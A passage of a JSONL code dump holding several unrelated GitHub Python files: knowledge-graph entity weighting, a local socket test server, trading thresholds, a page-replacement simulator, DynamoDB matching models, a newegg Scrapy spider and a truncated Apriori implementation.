\\n{df_train[y_col].value_counts()}')\n df_eval = d.loc[~d.index.isin(df_train.index.to_list())]\n\n # Save pre-training corpus as CSV in data folder (if not None)\n if data_folder:\n export_name = '{}_{}_{}'.format(dname, thr, y_col)\n o_path = f'{data_folder}/{export_name}.csv'\n df_train.to_csv(o_path, index=False)\n print(f' Pre-training corpus exported to {data_folder}: {export_name}')\n\n return df_train, df_eval\n\n\ndef __get_inferred(ent_assert: list,\n kg: owlready2.namespace.Ontology,\n infer_method: str) -> List:\n \"\"\" Return list of all entities inferred in the list of asserted entities \"\"\"\n # Use KG structure to infer new entity information\n if infer_method == 'hierarchical':\n # ... [c1.iri, c2.iri, c11.iri]\n from functions.kg.utils import get_hierarchical_info\n ent_infer = [c_infer for c_assert in ent_assert\n for c_infer in get_hierarchical_info(c_assert, kg)]\n elif infer_method == 'none':\n ent_infer = []\n else:\n raise Exception(f'{infer_method} Invalid method for using KG structure to infer information about terminology.'\n f'Method selected in the list: ' + ', '.join(INFER_METHODS))\n return ent_infer\n\n\ndef __entity_matching(df: pd.DataFrame,\n inv_index: kg_index.EntityMatching,\n text_col: str,\n id_col: str,\n kg: owlready2.namespace.Ontology,\n checkpoint_root: str,\n match_method: str,\n infer_method: str):\n print(f'Identifying entities asserted and inferred in train subset: infer_method = {infer_method}')\n matching_df = pd.DataFrame()\n check_asserted = f'{checkpoint_root}.pkl'\n if not os.path.exists(check_asserted):\n print(' matching entities')\n # Create KG dicts for entity matching ({entity: [label, synonym, etc]})\n kg_dict = kg_utils.get_kg_dict(kg)\n\n # Return list of entities asserted in the text\n matching_df['ent_assert'] = kg_utils.get_entity_matches(df, inv_index, text_col, id_col, kg_dict, match_method)\n matching_df['ent_assert'].to_pickle(check_asserted)\n print(' checkpoint to: {}'.format(check_asserted))\n else:\n print(' found checkpoint of matched entities. Importing from: {}'.format(check_asserted))\n matching_df['ent_assert'] = pd.read_pickle(check_asserted)\n\n check_inferred = f'{checkpoint_root}-{infer_method}.pkl'\n if not os.path.exists(check_inferred):\n print(' inferring information from asserted entities')\n matching_df['ent_infer'] = matching_df['ent_assert'].apply(\n lambda ent_assert: __get_inferred(ent_assert, kg, infer_method)\n )\n matching_df['ent_infer'].to_pickle(check_inferred)\n print(' checkpoint to: {}'.format(check_inferred))\n else:\n print(' found checkpoint of inferred entities. Importing from: {}'.format(check_inferred))\n matching_df['ent_infer'] = pd.read_pickle(check_inferred)\n\n # Return list of inferred entities\n return matching_df.apply(lambda row: row['ent_assert'] + row['ent_infer'], axis=1)\n\n\ndef __compute_weights(d_train: pd.DataFrame,\n X_col: str,\n y_col: str,\n weighting_f: str,\n o_path: str):\n print(\"Computing and saving entity weights to get weighted KG ({IRI: weight}): \"\n f\"weighting f={weighting_f}\")\n if weighting_f in WEIGHT_BY_SCORE:\n # Exporting weights from ratios in positive and negative class\n ent_match_pos = d_train.loc[d_train[y_col] == 1, X_col]\n ent_match_neg = d_train.loc[d_train[y_col] == 0, X_col]\n\n # Computing the weights\n if weighting_f == 'docf':\n # Get document frequencies in positive and negative space (unique occurrences by number of docs)\n freq_pos = kg_weight.get_DocF(ent_match_pos)\n freq_neg = kg_weight.get_DocF(ent_match_neg)\n\n # Compute weights as the avg of the difference in both classes\n weights = kg_weight.get_ratio(freq_pos, freq_neg)\n else:\n raise Exception(f'{weighting_f} weight function not in list of scoring methods: {WEIGHT_BY_SCORE}')\n # Saving results:\n save_dict(weights, o_path)\n\n elif weighting_f in WEIGHT_BY_MODEL:\n # Exporting weights from the feature coefficients of LR model trained on entities\n pipeline = kg_weight.get_ML_coefficients(d_train, X_col, y_col, weighting_f)\n # Dist vect is the vectorizer and model. Save them with joblib.\n joblib.dump(pipeline, f'{o_path}.joblib')\n\n else:\n raise Exception(f'{weighting_f} Invalid method for weighting entities based on their distribution.'\n f'Method selected in the list: ' + ', '.join(WEIGHT_FS))\n\n\ndef kg_adaptation(dname: str,\n kg_path: str,\n identities: List[str],\n **opt_config):\n # Parse with default config parameters\n config = {'thr': THRS[0],\n 'match_method': MATCH_METHODS[0],\n 'infer_method': INFER_METHODS,\n 'weight_f': WEIGHT_FS}\n for k, v in opt_config.items():\n if k in config.keys():\n config[k] = v\n\n # Import processed df from data folder\n d, text_col, id_col, g_labels = dc.import_dataset(dname)\n y_col = ''.join([i for identity in identities for i in identity.split('_')])\n\n # Import and save kg to result folder\n kg = collect_owl_from_path(kg_path)\n kg_name = kg_path.rsplit('.', 1)[-2].split('/')[-1]\n\n # Draw pre-training corpus fom identities\n d_train, _ = adaptation_subset(d, g_labels, dname, config[\"thr\"], identities)\n\n # Entity matching: identify entities asserted and inferred in text using KG\n check_root = f'{CHECKPOINTS_FOLDER}/{kg_name}_{dname}_{y_col}_{config[\"thr\"]}-{config[\"match_method\"]}'\n if not os.path.exists(CHECKPOINTS_FOLDER):\n os.mkdir(CHECKPOINTS_FOLDER)\n # Method 3: how to create index to do the entity matching\n t0 = time.time()\n # ... create custom index col (not required for creating entity weights)\n d_train[id_col] = range(0, d_train.shape[0])\n d_train[id_col] = d_train[id_col].apply(lambda id: str(id))\n # ... create inverted index\n inv_index = kg_index.indexing_df(d_train, text_col, id_col, config[\"match_method\"])\n print(\"Executed in %s seconds.\" % str(time.time() - t0))\n\n # Method 4: how to use KG structure to identify terminology (infer methods)\n for infer_method in config[\"infer_method\"]:\n t0 = time.time()\n # ... do entity matching and infer information from kg\n d_train['entity_matches'] = __entity_matching(d_train,\n inv_index,\n text_col,\n id_col,\n kg,\n check_root,\n config[\"match_method\"],\n infer_method)\n print(\"Executed in %s seconds.\" % str(time.time() - t0))\n\n for weight_f in config[\"weight_f\"]:\n # Method 5: how to weight entities based on the training corpus context\n # Create or expand weights of a KG contextual utterance\n t0 = time.time()\n # ... get the path to output weights\n method_name = '-'.join([str(config[\"thr\"]), config[\"match_method\"], infer_method, weight_f])\n o_path = f'{OUTPUT_FOLDER}/{kg_name}_{dname}_{y_col}_{method_name}'\n\n __compute_weights(d_train,\n 'entity_matches',\n y_col,\n weight_f,\n o_path)\n print(\"Executed in %s seconds.\" % str(time.time() - t0))\n # ...to explore: weights = pd.DataFrame.from_dict(weights, orient='index')\n print(' Success exporting entity weights to: {}'.format(o_path))\n\n return\n\n\ndef main():\n desc = \"Create and save weighted KG and its evaluation subset in result folder\"\n parser = argparse.ArgumentParser(description=desc)\n\n # Required arguments\n parser.add_argument(\"--d_name\",\n default=None,\n type=str,\n required=True,\n help=f\"Pre-training corpus for the KG adaptation: {DNAMES}\",\n )\n\n parser.add_argument(\"--knowledge_graph_path\",\n default=None,\n type=str,\n required=True,\n help=\"Path to knowledge graph OWL file.\",\n )\n\n parser.add_argument(\"--identities_pretraining\",\n default=None,\n type=str,\n required=True,\n help=\"Column names in pre-training corpus for the identities (groups or subgroups) \"\n \"based on which to assign weights to the KG\"\n \" (up to 2 identity groups or subgroups, separated by ,)\",\n )\n\n # Optional arguments\n parser.add_argument(\"--thr\",\n default=0.5,\n type=str,\n required=False,\n help=\"Configuration argument: \\n\"\n \"-- threshold to binarize labels (default: 0.5 percentage of annotator agreement).\",\n )\n\n parser.add_argument(\"--match_method\",\n default='stem',\n type=str,\n required=False,\n help=\"Configuration argument: \\n\"\n \"-- method for matching algorithm to texts (default: stemming).\",\n )\n\n parser.add_argument(\"--infer_method\",\n default='hierarchical',\n type=str,\n required=False,\n help=\"Configuration argument: \\n\"\n \"-- method for inferring information of entity from KG (default: use hierarchy).\",\n )\n\n parser.add_argument(\"--weight_f\",\n default='docf',\n type=str,\n required=False,\n help=\"Configuration argument: \\n\"\n \"-- method for weighting entities based on distribution \"\n \"(default: use document frequencies).\",\n )\n\n args = parser.parse_args()\n\n # parse kwargs from optional arguments (specified or default values)\n other_args = {'thr': float(args.thr),\n 'match_method': args.match_method,\n 'infer_method': [args.infer_method],\n 'weight_f': [args.weight_f]}\n\n print('Computing entity weights: {}\\n Optional args: {}'.format(args, other_args))\n kg_adaptation(args.d_name,\n args.knowledge_graph_path,\n args.identities_pretraining.split(','),\n **other_args)\n return\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"preyero/hate-speech-identities","sub_path":"kg_adaptation.py","file_name":"kg_adaptation.py","file_ext":"py","file_size_in_byte":19424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33415668180","text":"#!/usr/bin/python3\nimport socket\nimport time\n\nIP = \"127.0.0.1\"\nport = 8080\n\n#create socket object\ns = socket.socket() \ns.bind(('', port))\nprint (f\"socket binded to {port}\")\n\n#set listner\ns.listen(5) \nprint (\"socket is listening\")\n\n \nwith open('./response.txt', 'r')as fp:\n resp = fp.read()\n\nresp = resp.encode('utf-8')\n\nwhile True: \n c, addr = s.accept() \n print ('Got a connection')\n rec = (c.recv(1024))\n print(rec.decode('utf-8'))\n\n time.sleep(999)\n \n c.send(resp)\n\n c.close() \n\n\n","repo_name":"LibertyCyber/ProxyIntercept","sub_path":"testing/intercept.py","file_name":"intercept.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"41032844340","text":"# Define indicator thresholds\nrsi_oversold = 30\nrsi_overbought = 70\nmacd_threshold = 0 # MACD line crosses above 0\nstoch_oversold = 20\nstoch_overbought = 80\ncci_oversold = -100\ncci_overbought = 100\nmfi_oversold = 30\nmfi_overbought = 70\nmin_volume = 10000000 # Minimum volume threshold\n","repo_name":"Membur/signal-new","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"2805878506","text":"import argparse\nimport sys\n\nclass Manager:\n def __init__(self, input):\n input = input.replace(\"\\n\", \"\")\n input = input.split('|')\n self.n_frames = int(input[0])\n self.frames = [False]*self.n_frames\n self.n_pages = int(input[1])\n self.sequential_page_accesses_to_store = input[2].split(' ')\n self.sequential_page_accesses = []\n self.algorithms_page_exchange = dict([('FIFO', 0), ('MRU', 0), ('NUF', 0), ('OPTIMAL', 0)])\n self.FIFO_aux = []\n self.MRU_aux = []\n self.NUF_aux = []\n\n def reset(self):\n self.sequential_page_accesses = self.sequential_page_accesses_to_store.copy()\n self.frames = [False]*self.n_frames\n self.FIFO_aux = []\n self.MRU_aux = []\n self.NUF_aux = []\n \n def show(self):\n print(\"Manager -> frame: {} | page: {} | sequnetial_accesses: {}\".format(self.n_frames, self.n_pages, self.sequential_page_accesses_to_store))\n print(\"Frames:\", self.frames)\n\n def output(self):\n # print(Número de trocas de página no algoritmo FIFO|Número de trocas de página no algoritmo MRU|Número de trocas de página no algoritmo NUF|Número de trocas de página no algoritmo ótimo|nome do algoritmo com desempenho mais próximo do ótimo) \n self.optimal_algorithm()\n self.FIFO_algorithm()\n self.MRU_algorithm()\n self.NUF_algorithm()\n # print(self.algorithms_page_exchange)\n APE_aux = self.algorithms_page_exchange.copy()\n APE_aux.pop('OPTIMAL')\n # encontra o menor valor \n better = min(APE_aux, key=lambda key: APE_aux[key])\n # testa quantos valores tem o mesmo valor do melhor\n test = [APE_aux[key] == APE_aux[better] for key in APE_aux.keys()]\n if test.count(True) > 1: better = \"empate\"\n \n print(\"\\n{:>4}|{:>4}|{:>4}|{:>4}|{:>4}\".format(self.algorithms_page_exchange['FIFO'], self.algorithms_page_exchange['MRU'], self.algorithms_page_exchange['NUF'], self.algorithms_page_exchange['OPTIMAL'], better), end='')\n\n def is_this_page_in_frames(self, page):\n # checando se a pagina ja está em alguma moldura\n for frame in self.frames:\n if page == frame:\n return True\n return False\n \n def NUF_algorithm_inside_part(self, page):\n # ver se a pagina ja está em alguma moldura\n if self.is_this_page_in_frames(page):\n self.NUF_aux[self.frames.index(page)] += 1 # adicona um acesso\n return\n else:\n # ver se tem alguma moldura vazia\n self.algorithms_page_exchange['NUF'] += 1\n for i, frame in enumerate(self.frames):\n if frame == False:\n self.frames[i] = page\n self.NUF_aux[i] = 1\n return\n\n # ver qual página tem a menor frequencia de uso\n index = self.NUF_aux.index(min(self.NUF_aux))\n # print(\"index: \", index)\n self.frames[index] = page\n self.NUF_aux[index] = 1\n \n # # ver qual página tem a menor frequencia de uso\n # min_aux = min(self.NUF_aux)\n # indexes = []\n # for i, elem in enumerate(self.NUF_aux):\n # if elem == min_aux:\n # indexes.insert(0, i)\n # # indexes.append(i)\n # # print(self.NUF_aux)\n # # print(indexes)\n # index = indexes[0]\n # # print(\"index: \", index)\n # self.frames[index] = page\n # self.NUF_aux[index] = 0\n\n def NUF_algorithm(self):\n self.reset()\n self.NUF_aux = [0]*self.n_frames\n i = 0\n while len(self.sequential_page_accesses) > 0:\n page = self.sequential_page_accesses.pop(0)\n self.NUF_algorithm_inside_part(page)\n # print(\"page: \", page)\n # print(\"Frames:\", self.frames)\n # print(\"NUF_aux:\", self.NUF_aux)\n # print()\n\n # # sistema simples de envelhecimento\n # if i % self.n_frames == 0:\n # for j in range(self.n_frames): self.NUF_aux[j] = int(self.NUF_aux[j]/2)\n i += 1\n # print(\"Número de trocas de paginas: \", self.algorithms_page_exchange['NUF'])\n\n\n def MRU_algorithm_inside_part(self, page):\n # ver se a pagina ja está em alguma moldura\n if self.is_this_page_in_frames(page):\n self.MRU_aux.remove(page)\n self.MRU_aux.insert(0, page)\n return\n else:\n # ver se tem alguma moldura vazia\n self.algorithms_page_exchange['MRU'] += 1\n for i, frame in enumerate(self.frames):\n if frame == False:\n self.frames[i] = page\n self.MRU_aux.insert(0, page)\n return\n \n # ver qual página está a mais tempo sem uso\n removed_page = self.MRU_aux.pop()\n self.MRU_aux.insert(0, page)\n self.frames[self.frames.index(removed_page)] = page\n\n def MRU_algorithm(self):\n self.reset()\n while len(self.sequential_page_accesses) > 0:\n page = self.sequential_page_accesses.pop(0)\n # print(\"page: \",page)\n self.MRU_algorithm_inside_part(page)\n\n # print(\"frames: \", self.frames)\n # print(\"FIFO : \", self.FIFO_aux)\n # print()\n # print(\"Número de trocas de paginas: \", self.algorithms_page_exchange['MRU'])\n\n def FIFO_algorithm_inside_part(self, page):\n # ver se a pagina ja está em alguma moldura\n if self.is_this_page_in_frames(page):\n # self.FIFO_aux.remove(page)\n # self.FIFO_aux.insert(0, page)\n return\n else:\n # ver se tem alguma moldura vazia\n self.algorithms_page_exchange['FIFO'] += 1\n for i, frame in enumerate(self.frames):\n if frame == False:\n self.frames[i] = page\n self.FIFO_aux.insert(0, page)\n return\n \n # ver qual página está a mais tempo em uma moldura\n removed_page = self.FIFO_aux.pop()\n self.FIFO_aux.insert(0, page)\n self.frames[self.frames.index(removed_page)] = page\n\n def FIFO_algorithm(self):\n self.reset()\n # self.FIFO_aux = []\n while len(self.sequential_page_accesses) > 0:\n page = self.sequential_page_accesses.pop(0)\n # print(\"page: \",page)\n self.FIFO_algorithm_inside_part(page)\n\n # print(\"frames: \", self.frames)\n # print(\"FIFO : \", self.FIFO_aux)\n # print()\n # print(\"Número de trocas de paginas: \", self.algorithms_page_exchange['FIFO'])\n\n def optimal_algorithm_inside_part(self, page):\n # ver se a pagina ja está em alguma moldura\n if self.is_this_page_in_frames(page):\n return\n else:\n # ver se tem alguma moldura vazia\n self.algorithms_page_exchange['OPTIMAL'] += 1\n for i, frame in enumerate(self.frames):\n if frame == False:\n self.frames[i] = page\n return\n\n # ver qual moldura tem a página que está mais longe de ser chamada\n distance_to_be_called = [0]*self.n_frames\n for i, frame in enumerate(self.frames):\n for aux_page in self.sequential_page_accesses:\n if frame == aux_page:\n break\n distance_to_be_called[i] += 1\n #ver se a moldura tem uma pagina que nunca sera chamada novamente\n if distance_to_be_called[i] == len(self.sequential_page_accesses):\n # print(\"dis: \", distance_to_be_called[i],\"tam: \", len(self.sequential_page_accesses))\n # print(self.frames[i], \"nunca é chamada novamente\")\n self.frames[i] = page\n return\n index = distance_to_be_called.index(max(distance_to_be_called))\n # print(\"index: \", index)\n self.frames[index] = page\n # print(\"dtbc: \", distance_to_be_called)\n \n def optimal_algorithm(self):\n self.reset()\n while len(self.sequential_page_accesses) > 0:\n page = self.sequential_page_accesses.pop(0)\n # print(\"page: \",page)\n self.optimal_algorithm_inside_part(page)\n \n # print(self.frames)\n # print(\"Número de trocas de paginas: \", self.algorithms_page_exchange['OPTIMAL'])\n\ndef main():\n arq = open(path, \"r\").readlines()\n print('FIFO| MRU| NUF|OPTIMAL', end='')\n for i, line in enumerate(arq):\n # print(\"\\nlinha:\", i)\n manager = Manager(line)\n manager.output()\n\nif __name__ == '__main__':\n # aqui são definidos as configurações que se recebe por argumento quando executa o código.\n print(\"em caso de duvidas, execute com 'python3 main.py -h'\", file=sys.stderr)\n parser = argparse.ArgumentParser(description = \"Simulador de algoritmos de substituição de páginas na memória {:>>11} by: Lucas T. G.\".format(''))\n parser.add_argument('--arquivo', '-a', action = 'store', dest = 'path', \n required=True, help = \"Arquivo e/ou diretorio com os dados de entrada(este argumento é necessário).\")\n \n args = parser.parse_args()\n path = args.path\n main()","repo_name":"Lucas-t-g/Simulador-de-algoritmos-de-substituicao-de-paginas-na-memoria","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9527,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"6100471972","text":"import datetime\nimport json\nimport os\nimport random\nimport time\nimport uuid\n\nimport lambdae.shared as shared\n\nfrom pynamodb.attributes import (UnicodeAttribute, UTCDateTimeAttribute)\nfrom pynamodb.models import Model\nimport pynamodb.exceptions\n\nUSERS_TABLE = shared.get_env_var(\"USERS_TABLE\")\nMATCHES_TABLE = shared.get_env_var(\"MATCHES_TABLE\")\n\nINTERVAL_MS = 50\n\n# Set by serverless when running locally/testing\nIS_LOCAL = \"IS_LOCAL\" in os.environ\n\n\nclass NoMatchException(Exception):\n def __init__(self, msg: str):\n self.msg = msg\n\n\nclass AbstractTimestampedModel(Model):\n created_dt = UTCDateTimeAttribute(null=False, default=datetime.datetime.now())\n updated_dt = UTCDateTimeAttribute(null=False)\n\n def save(self, *args, **kwargs):\n self.updated_dt = datetime.datetime.now()\n super(AbstractTimestampedModel, self).save(*args, **kwargs)\n\n def __iter__(self):\n for name, attr in self._get_attributes().items():\n yield name, attr.serialize(getattr(self, name))\n\n\nclass UsersModel(AbstractTimestampedModel):\n class Meta:\n table_name = USERS_TABLE\n\n if IS_LOCAL:\n host = \"http://localhost:8000\"\n else:\n region = \"us-west-2\"\n\n group_id = UnicodeAttribute(hash_key=True, null=False)\n user_id = UnicodeAttribute(range_key=True, null=False)\n\n username = UnicodeAttribute(null=False)\n teamname = UnicodeAttribute(null=False)\n email = UnicodeAttribute(null=False)\n url = UnicodeAttribute(null=False)\n avatar = UnicodeAttribute(null=False)\n\n\nclass MatchesModel(AbstractTimestampedModel):\n class Meta:\n table_name = MATCHES_TABLE\n\n if IS_LOCAL:\n host = \"http://localhost:8000\"\n else:\n region = \"us-west-2\"\n\n group_id = UnicodeAttribute(hash_key=True, null=False)\n match_id = UnicodeAttribute(range_key=True, null=False)\n\n offerer_id = UnicodeAttribute(null=True)\n answerer_id = UnicodeAttribute(null=False)\n offer = UnicodeAttribute(null=True)\n answer = UnicodeAttribute(null=True)\n\n\ndef propose_match(user: UsersModel, offer: dict) -> MatchesModel:\n \"\"\"\n Propose matches to all in my group:\n On success: return the match record\n On failure: raise a NoMatchException\n \"\"\"\n HAS_NO_MATCH = MatchesModel.offerer_id.does_not_exist()\n\n # Get the unmatched people in my group, and shuffle them\n potential_matches = list(MatchesModel.query(user.group_id, filter_condition=HAS_NO_MATCH))\n random.shuffle(potential_matches)\n\n count = 0\n actions = [MatchesModel.offerer_id.set(user.user_id), MatchesModel.offer.set(json.dumps(offer))]\n for potential_match in potential_matches:\n try:\n potential_match.update(actions=actions, condition=HAS_NO_MATCH)\n return potential_match\n except pynamodb.exceptions.UpdateError:\n count += 1\n\n raise NoMatchException(\"Failed to match with %i other users\" % count)\n\n\ndef await_match(user: UsersModel, timeout_ms: int) -> MatchesModel:\n \"\"\"\n Await someone to propose a match to me.\n On success: return the match record\n On failure: raise a NoMatchException\n \"\"\"\n start_time = time.time()\n\n # No luck matching to someone else, so put my record in the table, and wait on it\n waiting_match = MatchesModel(\n group_id=user.group_id,\n match_id=str(uuid.uuid4()),\n offerer_id=None,\n answerer_id=user.user_id,\n offer=None,\n answer=None\n )\n waiting_match.save()\n\n while (time.time() - start_time) < (timeout_ms / 1000):\n try:\n waiting_match.refresh(consistent_read=True)\n except MatchesModel.DoesNotExist:\n # Timing out after possible reentrant deletion...\n raise NoMatchException(\"Match record deleted before await completed.\")\n\n # Success condition\n if waiting_match.offerer_id is not None:\n return waiting_match\n time.sleep(INTERVAL_MS / 1000)\n\n # Try to delete the match record, but only if unmatched\n try:\n waiting_match.delete(condition=MatchesModel.offerer_id.does_not_exist())\n except pynamodb.exceptions.DeleteError:\n try:\n waiting_match.refresh(consistent_read=True)\n except MatchesModel.DoesNotExist:\n # Timing out after possible reentrant deletion...\n raise NoMatchException(\"Match record deleted before await completed.\")\n\n return waiting_match\n\n raise NoMatchException(\"Waited for %ims but no one proposed a match.\" % timeout_ms)\n\n\ndef get_recent_matches(user: UsersModel) -> [str]:\n TIME_LIMIT_CONDITION = MatchesModel.created_dt < (datetime.datetime.utcnow() - datetime.timedelta(minutes=20))\n\n offered = MatchesModel.offerer_id == user.user_id\n answered = MatchesModel.answerer_id == user.user_id\n\n previous_partners = []\n # Matches where I was the offerer\n for match in MatchesModel.scan(user.group_id, filter_condition=offered & TIME_LIMIT_CONDITION):\n previous_partners.append(match.answerer_id)\n\n # Matches where I was the answerer\n for match in MatchesModel.scan(user.group_id, filter_condition=answered & TIME_LIMIT_CONDITION):\n previous_partners.append(match.offerer_id)\n\n return previous_partners\n","repo_name":"johnw188/watercoolerRoulette","sub_path":"backend/lambdae/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39556994669","text":"import scrapy\nimport re\n\nfrom SimpleSpiders.items import GpuVideoGraphicItem\nfrom scrapy.loader import ItemLoader\n\nclass GpusvideographicscardsSpider(scrapy.Spider):\n name = \"GpusVideoGraphicsCards\"\n allowed_domains = [\"www.newegg.com\"]\n start_urls = [\n \"https://www.newegg.com/GPUs-Video-Graphics-Cards/SubCategory/ID-48/Page-1?Tid=7709\"\n ]\n\n def __init__(self, pages=\"1,100\"):\n rangePages = pages.split(\",\")\n for i in range(int(rangePages[0]), int(rangePages[1]) + 1):\n list_url = \"https://www.newegg.com/GPUs-Video-Graphics-Cards/SubCategory/ID-48/Page-\"+ str(i) +\"?Tid=7709\"\n print(list_url)\n self.start_urls.append(list_url)\n\n def parse_detail(self, response, item):\n\n max_resolution = \"\"\n display_port = \"\"\n hdmi = \"\"\n direct_x = \"\"\n model = \"\"\n\n product_details = response.css(\"#product-details .tab-panes\")\n\n for table_horizontal in product_details.css(\".tab-pane:nth-child(2) .table-horizontal\"):\n if(table_horizontal.css(\"caption::text\").extract_first() == \"Model\"):\n tr = table_horizontal.css(\"tbody tr\")\n for r in tr:\n th = r.css(\"th::text\").extract_first()\n if(th == \"Model\"):\n td = r.css(\"td::text\").extract_first()\n model = td\n\n elif(table_horizontal.css(\"caption::text\").extract_first() == \"Ports\"):\n tr = table_horizontal.css(\"tbody tr\")\n for r in tr:\n th = r.css(\"th::text\").extract_first()\n if(th == \"DisplayPort\"):\n td = r.css(\"td::text\").extract_first()\n display_port = td\n if(th == \"HDMI\"):\n td = r.css(\"td::text\").extract_first()\n hdmi = td\n\n elif(table_horizontal.css(\"caption::text\").extract_first() == \"3D API\"):\n tr = table_horizontal.css(\"tbody tr\")\n for r in tr:\n th = r.css(\"th::text\").extract_first()\n if(th == \"DirectX\"):\n td = r.css(\"td::text\").extract_first()\n direct_x = td\n\n elif(table_horizontal.css(\"caption::text\").extract_first() == \"Details\"):\n tr = table_horizontal.css(\"tbody tr\")\n for r in tr:\n th = r.css(\"th::text\").extract_first()\n if(th == \"Max Resolution\"):\n td = r.css(\"td::text\").extract_first()\n max_resolution = td\n \n else:\n continue\n \n \n\n item[\"others\"] = {\n \"MaxResolution\": max_resolution,\n \"DisplayPort\": display_port,\n \"HDMI\": hdmi,\n \"DirectX\": direct_x,\n \"Model\": model\n }\n\n yield item\n\n\n def parse(self, response):\n\n for item in response.css(\".item-cell\"):\n\n detail_url = item.css(\".item-title::attr(\\\"href\\\")\").extract_first()\n\n price = item.css(\".price-current strong::text\").extract_first()\n price_decimal = item.css(\".price-current sup::text\").extract_first()\n\n price_current = \"0\"\n if(price and price_decimal):\n price_current = re.sub(\"\\D\",\"\",price) + price_decimal\n\n item_loader = ItemLoader(item = GpuVideoGraphicItem(), selector=item)\n item_loader.add_css(\"item_id\", \".item-title::attr(\\\"href\\\")\")\n item_loader.add_css(\"title\", \".item-title::text\")\n item_loader.add_css(\"brand\", \".item-brand img::attr(\\\"title\\\")\")\n item_loader.add_css(\"price_shipping\", \".price-ship::text\")\n item_loader.add_css(\"rating\", \"a.item-rating::attr(\\\"title\\\")\")\n item_loader.add_css(\"rating_num\", \"a.item-rating .item-rating-num::text\")\n item_loader.add_css(\"image_url\", \".item-img img::attr(\\\"src\\\")\")\n item_loader.add_value(\"price\", price_current)\n item_loader.add_value(\"url\", detail_url)\n item_loader.add_value(\"referer\", response.url)\n\n # yield item_loader.load_item()\n yield scrapy.Request(detail_url, callback=self.parse_detail, cb_kwargs=dict(item=item_loader.load_item()))\n \n # Collect pagination to get current page\n # CURRENT_SELECTOR = \".list-tool-pagination .btn-group .btn-group-cell .is-current::text\"\n # current_page = response.css(CURRENT_SELECTOR).extract_first()\n # if current_page:\n # next_page = int(current_page) + 1\n\n # print(\"Run next page: %s -> %s\", current_page, next_page)\n\n # yield scrapy.Request(\"https://www.newegg.com/GPUs-Video-Graphics-Cards/SubCategory/ID-48/Page-\"+ str(next_page) +\"?Tid=7709\")\n","repo_name":"brucent2610/DataEngineerCoaching","sub_path":"Projects/Project02/SimpleSpiders/SimpleSpiders/spiders/GpusVideoGraphicsCards.py","file_name":"GpusVideoGraphicsCards.py","file_ext":"py","file_size_in_byte":4897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74340996964","text":"import pandas as pd\nimport itertools\nimport time as time\nfrom collections import OrderedDict\n\n\ndata = pd.read_csv('sign.txt',header=None)\nD = []\nrecords = []\n\nfor i in range(0,len(data)):\n li = []\n li = data.values[i][0].split(' -1 ')\n li.sort()\n ma = {}\n for j in range(0,len(li)):\n ma[li[j]] = 1\n dict = OrderedDict(sorted(ma.items()))\n del dict['-2']\n D.append(dict)\n lis = []\n for key in dict.keys():\n \tlis.append(key)\n records.append(lis)\n\n\nD.sort(key=len)\nmod = 11\n\ndef add_to_ans(L):\n lis = []\n for key in L.keys():\n lis.append(key)\n return lis\n\ndef prune(itemset,l,n):\n for j in range(0,len(itemset)):\n i = ()\n for k in range(0,len(itemset)):\n if k!=j:\n i= i + (itemset[k],)\n if not i in l.keys():\n return False\n return True\n\n\ndef apriori_gen(Lk_1,k):\n C = list(Lk_1.keys())\n Ck = []\n for i in range(len(C)):\n for j in range(i+1,len(C)):\n s1 = C[i]\n s2 = C[j]\n flag = True\n for p in range(0,k-2):\n if s1[p] != s2[p]:\n flag = False\n break\n \n if flag:\n s1 = s1 + (s2[k-2],)\n Ck.append(s1)\n \n L = []\n for i in range(len(Ck)):\n if prune(Ck[i],Lk_1,k-1):\n L.append(Ck[i])\n \n return L\ndef stage_1(items, msp):\n c1 = {}\n for i in range(0,len(records)):\n \tfor j in range(0,len(records[i])):\n \t\tif records[i][j] in c1.keys():\n \t\t\tc1[records[i][j]] += 1\n \t\telse:\n \t\t\tc1[records[i][j]] = 1\n \n C = OrderedDict(sorted(c1.items()))\n l1 = {}\n for key in C.keys():\n if C[key] >= msp:\n l1[key] = C[key] \n \n return l1\ndef stage_2(l1, records, msp):\n l1 = list(l1.keys())\n L1 = list(itertools.combinations(l1, 2))\n C2 = {}\n L2 = {}\n for iter1 in L1:\n count = 0\n for iter2 in records:\n if(all(x in iter2 for x in iter1)):\n count+=1\n C2[iter1] = count\n\n C = OrderedDict(sorted(C2.items()))\n for key in C.keys():\n if C[key] >= msp:\n L2[key] = C[key]\n \n return L2\ndef stage_x(l2, records, msp,k):\n L2 = apriori_gen(l2, k)\n ck = {}\n lk = {}\n for iter1 in L2:\n count = 0\n for iter2 in records:\n if(all(x in iter2 for x in iter1)):\n count+=1\n ck[iter1] = count\n\n C = OrderedDict(sorted(ck.items()))\n for key in C.keys():\n if C[key] >= msp:\n \tlk[key] = C[key] \n \n return lk\n\ndef apriori(msp):\n\tans=[]\n\tL1 = stage_1(records, msp)\n\tans.append(add_to_ans(L1))\n\tlk = stage_2(L1, records, msp)\n\tk = 3\n\twhile len(lk) > 0:\n\t\tans.append(add_to_ans(lk))\n\t\tlk = stage_x(lk,records,msp,k)\n\t\tk+=1\n\treturn ans\n\n\ndef frequent_1(D,msp):\n C = {}\n for i in range(0,len(D)):\n for key in D[i].keys():\n if key in C.keys():\n C[key] += 1\n else:\n C[key] = 1\n \n C1 = OrderedDict(sorted(C.items()))\n \n L1 = {}\n for key in C1.keys():\n if C1[key] >= msp:\n L1[key] = C1[key]\n \n return L1\n\n\ndef present(trans,lis):\n for i in range(0,len(lis)):\n if not lis[i] in trans.keys():\n return False\n return True\n\n\ndef frequent_2(Lk_1,D,msp,idx):\n L = list(itertools.combinations(Lk_1,2))\n CK = {}\n for iter1 in L:\n count = 0\n for i in range(idx,len(D)):\n flag 